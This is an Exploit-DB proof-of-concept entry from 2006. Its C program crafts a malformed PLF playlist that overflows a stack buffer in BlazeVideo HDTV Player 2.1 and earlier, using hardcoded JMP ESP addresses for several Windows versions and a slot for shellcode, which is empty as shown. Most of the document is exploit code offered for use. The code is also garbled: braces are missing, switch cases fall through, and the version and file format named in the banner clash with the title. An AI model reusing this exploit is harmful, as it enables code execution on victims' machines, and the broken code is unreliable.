BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC

ID EDB-ID:2880
Type exploitdb
Reporter Greg Linares
Modified 2006-12-01T00:00:00


BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC. CVE-2006-6199,CVE-2006-6396,CVE-2009-0450. Local exploit for windows platform

0-day BlazeVideo HDTV Player &lt;= v2.1 Malformed PLF Buffer Overflow PoC
BlazeVideo HDTV v2.1 and prior fails to properly handle large file paths inside
PLF files, the result is a stack based buffer overflow that allows an
attacker to execute code in the context of the player.

This exploit should also work for BlazeDVD v5.0, but i havent gotten
around to testing it.

C:\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]

Happy Hunting and Happy Holidays to everyone

&lt;insert super awesome leet ascii art here&gt;

30 days of Media Player Exploits by Greg Linares

Discovered and Reported By: Greg Linares
Reported Exploit Date: 12/1/2006


#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
int main(int argc, char *argv[])

       FILE *Exploit;

       /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders &lt;expanders[at]gmail[dot]com&gt; */
       unsigned char scode[] =

       /* replace it with your own shellcode :) */

       int JMP, x;

       printf("BlazeVideo HDTV Player &lt;= v2.3 M3U Buffer Overflow Exploit\n");
       printf("Discovered and Coded By: Greg Linares &lt;GLinares.code[at]gmail[dot]com&gt;\n");
       printf("Usage: %s &lt;output PLF file&gt; &lt;JMP&gt;\n", argv[0]);
       printf("\n JMP Options\n");
       printf("1 = English Windows XP SP 2 User32.dll &lt;JMP ESP 0x77db41bc&gt;\n");
       printf("2 = English Windows XP SP 1 User32.dll &lt;JMP ESP 0x77d718fc&gt;\n");
       printf("3 = English Windows 2003 SP0 and SP1 User32.dll &lt;JMP ESP 0x77d74adc&gt;\n");
       printf("4 = English Windows 2000 SP 4 User32.dll  &lt;JMP ESP 0x77e3c256&gt;\n");
       printf("5 = French Windows XP Pro SP2  &lt;JMP ESP 0x77d8519f&gt; \n");
       printf("6 = German/Italian/Dutch/Polish Windows XP SP2  &lt;JMP ESP 0x77d873a0&gt; \n");
       printf("7 = Spainish Windows XP Pro SP2 &lt;JMP ESP 0x77d9932f&gt; \n");
       printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 &lt;JMP ESP 0x77e04c29&gt;\n");
       printf("9 = French/Italian/Chineese Windows 2000 Server SP4 &lt;JMP ESP 0x77df4c29&gt;\n");

       /* thanks metasploit and jerome for opcodes */

       if (argc &lt; 2) {
               printf("Invalid Number Of Arguments\n");
               return 1;

       Exploit = fopen(argv[1],"w");
   if ( !Exploit )
       printf("\nCouldn't Open File!");
       return 1;

       fputs("C:\\", Exploit);

       for (x=0;x&lt;257;x++) {
               fputs("A", Exploit);

       if (atoi(argv[2]) &lt;= 0) {
               JMP = 1;
       } else if (atoi(argv[2]) &gt; 4) {
               JMP = 1;
       } else {
               JMP = atoi(argv[2]);
       switch(JMP) {
               case 1:
                       printf("Using English Windows XP SP2 JMP...\n");
                       fputs("\xbc\x41\xdb\x77", Exploit);
               case 2:
                       printf("Using English Windows XP SP1 JMP...\n");
                       fputs("\xfc\x18\xd7\x77", Exploit);
               case 3:
                       printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
                       fputs("\xdc\x4a\xd7\x77", Exploit);
               case 4:
                       printf("Using English Windows 2000 SP 4 JMP...\n");
                       fputs("\x56\xc2\xe3\x77", Exploit);
               case 5:
                       printf("Using French Windows XP SP 2 JMP...\n");
                       fputs("\x9f\x51\xd8\x77", Exploit);
               case 6:
                       printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
                       fputs("\xa0\x73\xd8\x77", Exploit);
               case 7:
                       printf("Using Spainish Windows XP SP 2 JMP...\n");
                       fputs("\x2f\x93\xd9\x77", Exploit);
               case 8:
                       printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
                       fputs("\x29\x4c\xe0\x77", Exploit);
               case 9:
                       printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n");
                       fputs("\x29\x4c\xdf\x77", Exploit);


       for (x=0;x&lt;16;x++) {
               fputs("\x58", Exploit);
       fputs(scode, Exploit);
       fputs("\r\n", Exploit);

       printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);

       printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
       printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
       return 0;

// [2006-12-01]